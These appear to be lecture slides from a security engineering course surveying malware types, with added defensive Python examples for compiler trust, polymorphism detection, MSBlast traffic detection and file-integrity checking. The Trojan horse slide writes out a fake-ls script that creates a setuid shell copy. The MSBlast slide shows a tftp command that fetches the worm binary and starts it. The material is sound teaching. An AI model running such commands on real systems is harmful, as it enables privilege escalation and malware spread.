Introduction to Malware
Dan Fleck, CS469 Security Engineering
Reference: Angelos Stavrou's ISA564 and Computer Security by Bishop
What is Malicious Software?
Malicious Software (a.k.a. Malware)
• Software designed to infiltrate or damage a computer system, without the owner's informed consent -- http://en.wikipedia.org/wiki/Malware
• Examples:
  • Viruses, worms, Trojan horses, spyware, and other malicious and unwanted software
  • How about adware?
• Malware references the intent of the creator, rather than any particular features
  • DRM vs. Rootkit (e.g., Sony CD rootkit)
Why should we care?
[Three chart slides; the charts are not recoverable as text. Source: Symantec Internet Threat Report 2012]
Taxonomy of Malicious Software
[Figure: taxonomy diagram, not recoverable as text]
Trapdoor/Backdoor
• Secret entry point into a system
• Specific user identifier or password that circumvents normal security procedures
• Commonly used by developers
• Could be included in a compiler
• Let's see Thompson's Compiler
Thompson's Compiler (source slide dated November 1, 2004, Slide #19-8)
• Modify the compiler so that when it compiles login, login accepts the user's correct password or a fixed password (the same one for all users)
• Then modify the compiler again, so when it compiles a new version of the compiler, the extra code to do the first step is automatically inserted
• Recompile the compiler
• Delete the source containing the modification and put the undoctored source back
The Login Program
  login source --> correct compiler --> login executable
                                          user password --> logged in

  login source --> doctored compiler --> login executable
                                          user password or magic password --> logged in
The Compiler
  compiler source --> correct compiler --> compiler executable
                                            login source --> correct login executable

  compiler source --> doctored compiler --> compiler executable
                                            login source --> rigged login executable
Thompson's Lesson
Verifying the source code isn't always enough!
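To make the lesson concrete, here is an added simulation (not from the slides or from Bishop's text) in which a "compiler" is a Python function mapping a source string to a callable "executable". The source strings, the magic password and the user database are constructed; the last function goes beyond the slides and applies David A. Wheeler's diverse double-compiling idea as the defender's check.

```python
import hashlib

# Constructed stand-ins for login.c and the compiler's own source; both are the
# clean, audited versions that sit on disk after step 4 of the slides.
LOGIN_SRC = "login: accept the password stored for the user"
COMPILER_SRC = "compiler: honest translation of source to executable"
MAGIC = "open-sesame"            # constructed fixed password planted by the rig
USER_DB = {"alice": "s3cret"}    # constructed password database

def compile_clean(source):
    """Correct compiler: a 'compiler' maps a source string to a callable."""
    if source == LOGIN_SRC:
        return lambda user, pw: USER_DB.get(user) == pw
    if source == COMPILER_SRC:
        return compile_clean      # compiling the compiler gives a clean compiler
    raise ValueError("unknown source")

def compile_doctored(source):
    """Doctored compiler: same input source, rigged output (slides 8-10)."""
    if source == LOGIN_SRC:       # step 1: login also accepts the fixed password
        return lambda user, pw: pw == MAGIC or USER_DB.get(user) == pw
    if source == COMPILER_SRC:    # step 2: the rig reinserts itself on recompile
        return compile_doctored
    raise ValueError("unknown source")

def sha256(text):
    return hashlib.sha256(text.encode()).hexdigest()

# Known-good hashes of the sources, as a source-auditing process would record.
PRISTINE = {"login": sha256(LOGIN_SRC), "compiler": sha256(COMPILER_SRC)}

def sources_verify():
    """The audit the slides warn about: every source file matches its hash."""
    return (sha256(LOGIN_SRC) == PRISTINE["login"]
            and sha256(COMPILER_SRC) == PRISTINE["compiler"])

def magic_password_works(installed_compiler):
    """Rebuild the compiler from clean source using the installed binary, build
    login with the result, and try the fixed password against a real user."""
    rebuilt = installed_compiler(COMPILER_SRC)
    login = rebuilt(LOGIN_SRC)
    return login("alice", MAGIC)

def diverse_double_compile_mismatch(installed_compiler, independent_compiler):
    """Defender's check (Wheeler's diverse double-compiling, not on the slides):
    bootstrap the clean compiler source through an independent compiler and
    compare the resulting login with the one the installed compiler produces.
    Real DDC compares binaries byte for byte; closures cannot be compared, so
    this toy compares behaviour on a probe input instead."""
    stage1 = independent_compiler(COMPILER_SRC)
    stage2 = stage1(COMPILER_SRC)
    trusted_login = stage2(LOGIN_SRC)
    installed_login = installed_compiler(COMPILER_SRC)(LOGIN_SRC)
    probe = ("alice", MAGIC)
    return trusted_login(*probe) != installed_login(*probe)
```

The source audit passes in both worlds; only rebuilding the toolchain through a compiler the attacker never touched exposes the rigged login.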
Logic Bomb
• Embedded in legitimate programs
• Activated when specified conditions met
  • E.g., presence/absence of some file; particular date/time or particular user
• When triggered, typically damages system
  • Modify/delete files/disks
• Example: Disgruntled employee adds trigger that when employee's salary record deleted from DB, all personnel records deleted also.
Can you think of other logic bombs?
Trojan Horse
Program with an expected and hidden effect
• Appears normal/expected
• Hidden effect violates security policy
User tricked into executing Trojan horse
• Expects (and sees) expected behavior
• Hidden effect performed with user's authorization

Attacker:
    cat >/homes/victim/ls <<eof
    cp /bin/sh /tmp/.xxsh
    chmod u+s,o+x /tmp/.xxsh
    rm ./ls
    ls $*
    eof
Victim:
    ls
Trojan Horse Example: NetBus
• Designed for Windows NT system
• Victim uploads and installs this
  • Usually disguised as a game program, or in one
• Acts as a server, accepting and executing commands for remote administrator
  • This includes intercepting keystrokes and mouse motions and sending them to attacker
  • Also allows attacker to upload, download files
Virus
• Program that inserts itself into one or more files and performs some action
  • Insertion phase is inserting itself into file
  • Execution phase is performing some (possibly null) action
• Self-replicating code
• Generally tries to remain undetected
• Pseudocode:
    If spread condition then
        For target files
            if not infected then alter to include virus
    Perform malicious action
    Execute normal program (step done only by Trojan horses to remain hidden)
Early Virus Reports
• Brain (Pakistani) virus (1986)
  • Written for IBM PCs
  • Alters boot sectors of floppies, spreads to other floppies
• MacMag Peace virus (1987)
  • Written for Macintosh
  • Prints "universal message of peace" on March 2, 1988 and deletes itself
Virus Types
Boot Sector
• Problem: How to ensure virus "carrier" executed?
• Solution: Place in boot sector of disk
  • Run on any boot
• Propagate by altering boot disk creation
• Less common with few boots off floppies
  (Brain virus used this)
Executable
• Malicious code placed at beginning of legitimate program (EXE or .COM)
• Runs when application run
Virus Types
Macro Virus
• Infected "executable" isn't machine code
• Relies on something "executed" inside application data
  • Common example: Macros
• Otherwise similar properties to other viruses
  • Architecture-independent
  • Application-dependent
Macro Virus Example
• Melissa
  • Infected Microsoft Word 97 and Word 98 documents
  • Windows and Macintosh systems
• Invoked when program opens infected file
• Installs itself as "open" macro and copies itself into Normal template
  • This way, infects any files that are opened in future
• Invokes mail program, sends itself to everyone in user's address book
Virus Types
Armored
• Encrypt virus
• Prevents "signature" to detect virus
Stealth
• Conceal infection
• Trap read and disinfect
  • Request for file length: return length of uninfected file
  • Request to open file: temporarily disinfect file, and reinfect on closing
  • Request to load file for execution: load infected file
• Let execute call infected file
Terminate and Stay Resident (TSR)
• Stays active in memory after application complete
• Allows infection of previously unknown files
• Trap calls that execute a program
Virus Types
Polymorphic
• A virus that changes its form each time it inserts itself into another program
• Idea is to prevent signature detection by changing the "signature" or instructions used for deciphering routine
  • At instruction level: substitute instructions
  • At algorithm level: different algorithms to achieve the same purpose
• Toolkits to make these exist (Mutation Engine, Trident Polymorphic Engine)
Polymorphic Example
• These are different instructions (with different bit patterns) but have the same effect:
  • add 0 to register
  • subtract 0 from register
  • xor 0 with register
  • no-op
• Polymorphic virus would pick randomly from among these instructions
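An added example, not from the slides: a toy instruction set (constructed encoding, not real x86 opcodes) containing the four equivalent instructions above. It shows that a byte signature taken from one mutation misses the rest, while an effect-based check that executes the code and looks for a changed register catches every variant.

```python
import random

# Constructed toy encoding (not real x86): [opcode, reg, imm]; nop is one byte.
ENCODING = {"add": 0x01, "sub": 0x02, "xor": 0x03, "nop": 0x90}

def assemble(mnemonic, reg=0, imm=0):
    """Encode one instruction into bytes."""
    if mnemonic == "nop":
        return bytes([ENCODING["nop"]])
    return bytes([ENCODING[mnemonic], reg, imm])

def execute(code, regs):
    """Tiny emulator: apply a byte stream to a register file (dict, 8-bit)."""
    regs = dict(regs)
    i = 0
    while i < len(code):
        op = code[i]
        if op == ENCODING["nop"]:
            i += 1
            continue
        reg, imm = code[i + 1], code[i + 2]
        if op == ENCODING["add"]:
            regs[reg] = (regs[reg] + imm) & 0xFF
        elif op == ENCODING["sub"]:
            regs[reg] = (regs[reg] - imm) & 0xFF
        elif op == ENCODING["xor"]:
            regs[reg] ^= imm
        else:
            raise ValueError(f"bad opcode {op:#x}")
        i += 3
    return regs

# The four "do nothing" forms from the slide: same effect, different bytes.
NOOP_VARIANTS = [assemble("add", 0, 0), assemble("sub", 0, 0),
                 assemble("xor", 0, 0), assemble("nop")]

def mutate(rng, length=4):
    """The slide's mutation step: pick randomly among the equivalent forms."""
    return b"".join(rng.choice(NOOP_VARIANTS) for _ in range(length))

def signature_match(code, signature):
    """Classic scanner: exact byte pattern lookup."""
    return signature in code

def is_effect_free(code, trials=8):
    """Effect-based check: run the code on random register states; if no
    state ever changes, the block is a no-op however it is encoded."""
    rng = random.Random(1)
    for _ in range(trials):
        regs = {0: rng.randrange(256)}
        if execute(code, regs) != regs:
            return False
    return True

def detection_rates(samples=200):
    """Catch rate of each method over `samples` mutated prologues, with the
    signature taken from the first mutation a scanner happened to see."""
    rng = random.Random(42)
    signature = mutate(rng)
    sig_hits = sem_hits = 0
    for _ in range(samples):
        code = mutate(rng)
        sig_hits += signature_match(code, signature)
        sem_hits += is_effect_free(code)
    return sig_hits / samples, sem_hits / samples
```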
Worm
• Runs independently
  • Does not require a host program
• Propagates a fully working version of itself to other machines
• Carries a payload performing hidden tasks
  • Backdoors, spam relays, DDoS agents; ...
• Phases
  • Probing, Exploitation, Replication, Payload
So, how is a virus different from a worm?
Worm Propagation
[Figure: propagation diagram, not recoverable as text]
MSBlast Worm (Aug 2003)
Steps alternate between the infected host (I) and the new victim (V):
 1. (I) Exploits target on port 135/TCP
 2. (V) Binds svchost.exe to port 4444/TCP via injected code
 3. (I) Connects to target on port 4444/TCP
 4. (V) Creates shell "cmd.exe" and binds it to port 4444/TCP
 5. (I) Creates "TFTP Server" on port 69
 6. (I) Sends "TFTP" command to shell
 7. (V) Runs TFTP command: teleports msblast.exe file
        tftp -l 192.168.0.1 GET msblast.exe
 8. (I) Sends "START msblast.exe" command
 9. (V) Runs worm on target
10. (I) Closes connection
11. (V) Shell closes
Firewall rule shown on the slide:
  TCP protocol; Direction: Inbound; Local end point ports: 135; Application: ANY; Remote End Point: ANY/ANY; Rule valid: ALWAYS; Action: DENY
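Added detection logic, not from the slides, that looks for the 135/TCP, then 4444/TCP, then 69/UDP sequence between one source and one target in flow records. The records, hosts and timestamps are constructed; the rule at the end encodes the slide's DENY rule to show that dropping step 1 breaks the whole chain.

```python
from collections import defaultdict

# Constructed flow records: (timestamp, proto, src, sport, dst, dport).
FLOWS = [
    (100, "tcp", "10.0.0.5", 1033, "10.0.0.9", 135),    # step 1: RPC exploit
    (101, "tcp", "10.0.0.5", 1034, "10.0.0.9", 4444),   # step 3: shell connect
    (103, "udp", "10.0.0.9", 1025, "10.0.0.5", 69),     # step 7: victim fetches worm
    (120, "tcp", "10.0.0.7", 2000, "10.0.0.9", 135),    # lone RPC flow, no chain
    (130, "tcp", "10.0.0.5", 1040, "10.0.0.12", 135),   # same source, second victim
    (131, "tcp", "10.0.0.5", 1041, "10.0.0.12", 4444),
    (133, "udp", "10.0.0.12", 1025, "10.0.0.5", 69),
]

def find_msblast_chains(flows, window=60):
    """Return (source, victim, start_time) for every source/victim pair whose
    flows show 135/TCP, then 4444/TCP, then a TFTP (69/UDP) request back from
    the victim, all within `window` seconds. A lone 135 hit never fires."""
    by_pair = defaultdict(list)
    for ts, proto, src, sport, dst, dport in sorted(flows):
        if proto == "tcp" and dport in (135, 4444):
            by_pair[(src, dst)].append((ts, dport))
        elif proto == "udp" and dport == 69:
            by_pair[(dst, src)].append((ts, 69))     # TFTP goes victim -> source
    hits = []
    for (src, dst), events in by_pair.items():
        t135 = t4444 = None
        for ts, port in events:
            if port == 135:
                t135, t4444 = ts, None                # (re)start the chain
            elif port == 4444 and t135 is not None:
                t4444 = ts
            elif port == 69 and t4444 is not None and ts - t135 <= window:
                hits.append((src, dst, t135))
                t135 = t4444 = None
    return hits

# The slide's firewall rule as data a simple rule engine could evaluate.
DENY_INBOUND_135 = {"protocol": "tcp", "direction": "inbound",
                    "local_ports": {135}, "action": "deny"}

def blocked_by(rule, flow):
    """True if an inbound flow to a protected host would be denied by `rule`."""
    _, proto, _, _, _, dport = flow
    return (rule["action"] == "deny" and proto == rule["protocol"]
            and dport in rule["local_ports"])

def chains_after_rule(flows, rule):
    """Re-run detection with the rule applied: no step 1, no chain."""
    return find_msblast_chains([f for f in flows if not blocked_by(rule, f)])
```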
Zombie
• Secretly takes over another networked computer by exploiting software flaws
• Builds the compromised computers into a zombie network or botnet
• Uses it to indirectly launch attacks
  • E.g., DDoS
Let's see how we create zombies...
Zombie: Steps - 1
[Diagram: Attacker and Unsecured Computers]
1. Attacker scans Internet for unsecured systems that can be compromised
Zombie: Steps - 2
[Diagram: Attacker and Unsecured Computers]
2. Attacker secretly installs zombie agent program, turning unsecured computers into zombies
Zombie: Steps - 3
[Diagram: Attacker, Zombies and Master Server]
3. Zombie agents "phone home" and connect to a master server
Zombie: Steps - 4
[Diagram: Attacker, Zombies and Master Server]
4. Attacker sends commands to Master Server to launch a DDoS attack against a targeted system
Zombie: Steps - 5
[Diagram: Attacker, Zombies, Master Server and TARGET]
5. Master server sends signal to zombies to launch attack on targeted system
Zombie: Steps - 6
[Diagram: Attacker, Zombies, Master Server, TARGET; User: Request Denied]
6. Target system is overwhelmed by zombie requests, denying requests from normal users
Rootkit
• "A rootkit is a set of programs and code that allows a permanent or consistent, undetectable presence on a computer"
• Goals:
  • Hide malicious resources (e.g., processes, files, registry keys, open ports, etc.)
  • Provide hidden backdoor access
Linux RootKit III
  Tool        Status     Purpose
  ls          Trojaned!  Hide files
  du          Trojaned!  Hide files
  ifconfig    Trojaned!  Hide sniffing
  netstat     Trojaned!  Hide connections
  chfn        Trojaned!  User->r00t
  chsh        Trojaned!  User->r00t
  inetd       Trojaned!  Remote access
  login       Trojaned!  Remote access
  passwd      Trojaned!  User->r00t
  ps          Trojaned!  Hide processes
  top         Trojaned!  Hide processes
  rshd        Trojaned!  Remote access
  syslogd     Trojaned!  Hide logs
  linsniffer             Packet sniffer!
  fix                    File fixer!
  z2                     Zap2 utmp/wtmp/lastlog eraser!
  wted                   wtmp/utmp editor!
  lled                   lastlog editor!
  bindshell              port/shell type daemon!
  tcpd        Trojaned!  Hide connections, avoid denies
Rootkit
• Simple rootkits:
  • Modify user programs (ls, ps)
  • Detectable by tools like Tripwire
• Sophisticated rootkits:
  • Modify the kernel itself
  • Hard to detect from userland
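An added Tripwire-style check for the simple-rootkit case (this is not Tripwire's code): baseline a digest, size and permission bits for each monitored binary, then report whatever changed. The demo builds stand-in copies of ls, ps, netstat and ifconfig in a temporary directory so it runs offline.

```python
import hashlib
import os
import tempfile

def file_digest(path):
    """SHA-256 of a file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def build_baseline(paths):
    """Record (digest, size, permission bits) per monitored file. The mode is
    kept so that a chmod such as the Trojan horse slide's setuid trick is
    caught even when the bytes are unchanged."""
    baseline = {}
    for p in paths:
        st = os.stat(p)
        baseline[p] = (file_digest(p), st.st_size, st.st_mode & 0o7777)
    return baseline

def check_integrity(baseline):
    """Compare current state with the baseline; return path -> reason for
    every monitored file that vanished or changed."""
    findings = {}
    for p, (digest, size, mode) in baseline.items():
        if not os.path.exists(p):
            findings[p] = "missing"
            continue
        st = os.stat(p)
        if file_digest(p) != digest:
            findings[p] = "content changed"
        elif (st.st_mode & 0o7777) != mode:
            findings[p] = "permissions changed"
        elif st.st_size != size:
            findings[p] = "size changed"
    return findings

def demo():
    """Constructed stand-ins for the tools in a temp dir, then an LRK-style
    replacement of ls and a setuid bit added to ps."""
    with tempfile.TemporaryDirectory() as d:
        tools = {}
        for name in ("ls", "ps", "netstat", "ifconfig"):
            tools[name] = os.path.join(d, name)
            with open(tools[name], "wb") as f:
                f.write(b"#!/bin/sh\necho genuine " + name.encode() + b"\n")
            os.chmod(tools[name], 0o755)
        # The baseline must be taken while the host is known clean and kept
        # off-host: a rootkit that can edit it (or the checker) defeats the check.
        baseline = build_baseline(tools.values())
        with open(tools["ls"], "wb") as f:             # trojaned ls
            f.write(b"#!/bin/sh\necho trojaned ls\n")
        os.chmod(tools["ps"], 0o4755)                  # setuid added to ps
        return {os.path.basename(p): why
                for p, why in check_integrity(baseline).items()}
```

A kernel-level rootkit can answer the checker's reads with clean bytes, which is why the slide calls that class hard to detect from userland.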
Rootkit Classification
[Figure: classification diagram]
• Replace apps
• Add code to all apps
• Replace/modify kernel modules
See: http://www.phrack.org/issues.html?issue=62&id=12
Rootkit Classification
[Figure: classification diagram]
• Run entire OS in a virtual machine
Lessons
• Malware comes in many types and styles
• It's not going away and will always hit new platforms as they come out
• We'll need multiple approaches to defend against them.
Next up: Malware Defense!